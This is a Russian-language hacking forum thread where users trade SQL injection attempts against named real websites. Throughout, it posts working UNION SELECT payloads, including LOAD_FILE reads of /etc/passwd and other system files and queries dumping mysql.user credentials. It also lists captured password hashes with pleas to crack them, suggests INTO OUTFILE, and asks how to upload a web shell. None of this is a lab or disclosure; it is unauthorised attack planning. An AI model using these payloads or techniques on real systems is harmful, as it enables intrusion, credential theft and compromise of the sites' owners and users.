Ваши вопросы по уязвимостям.

Это не ошибка MSSQL, это VB.

 

Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?

 

Да, вообще там используется System.Number.ParseInt32.

 

Мде... чёт я не подумал).Всё равно попробую)

 

Вот у меня несколько вопросов
Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу

Code:

http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,password,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*

В таблице Users имеются следующие колонки

Code:

Users
--id,username,password,email

Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
в придачу даю список всех таблиц

Code:

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Blog
Cats
Comment
My_places
Portfolio
Snippet
Snippet_cat
Snippet_language
Tags
Testimonials
Top_cat
Top_rated
User
Users

 

лови .. и думай ..

 

http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
Аналогичный прошлый вопрос.

 

Ershik
Только расскрытие пути

 

http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


скуля...какие предложения по раскрутке?

 

К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'

 

Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);

 

http://ru2.php.net/manual/en/function.array-count-values.php

 

z3r0cool ошибка появляется не только в этом параметре....
на пример введи в поле поиска кавычку

 

Gorev
Поиск это и есть параметр sstring
Запрос у тебя вываливается на страницу посмотри внимательно ,и всё сам увидишь
Попробуй ввести 10 символов(любых) и ковычку ошибки не будет, а 9 символов и ковычка- ошибка То-есть обрезается запрос после 10 символов + 2 знака %
LIKE '%твои_10_символов%'

 

jokester spasibo... znachit ne sud'ba

 

Люди!!! Что делать?
Вот получил 80 kb хлама по запросам:
?news_id=9999+union+select+1,2,3,4,5,6,7/*
?news_id=9999+union+select+1,2,3,DATABASE(),5,6,7/*
?news_id=9999+union+select+1,2,3,USER(),5,6,7/*
?news_id=9999+union+select+1,2,3,VERSION(),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7/*
?news_id=9999+union+select+1,2,3,concat_ws(0x2F,us er,password),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/syslog.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/ftpusers'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/proftpd.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/hosts'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/services'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/group'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/profile'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/bashrc'),5,6,7/*

Самое ценное это

horde/7ec6cb6253573035
pma_0m8q29w9ure8/042d59146e94d7b2
admin/54e0c6945fa5e34c
u15364/6cb1963d2018c3ea

А что теперь делать то? Hash расшифровать неполучается.
Нужен дамп базы данных! HELP ME

 

Хеши Mysql попробуй попросить сбрутить из за платно.

 

Уже раз 10 просил - пока ничего
http://hashcracking.info - нет результата
PasswordRpo - кислота
HELP ME

 

INTO OUTFILE вроде никто не отменял?
Кидай если что линк в личку, посмотрим.

 

могу менять html код страницы, знаю полный путь до папки, как залить шелл? а именно стянуть с удаленного сервака файл в эту папку?
Конструкции типа <? php system("ls") ?> не выполняются. js работает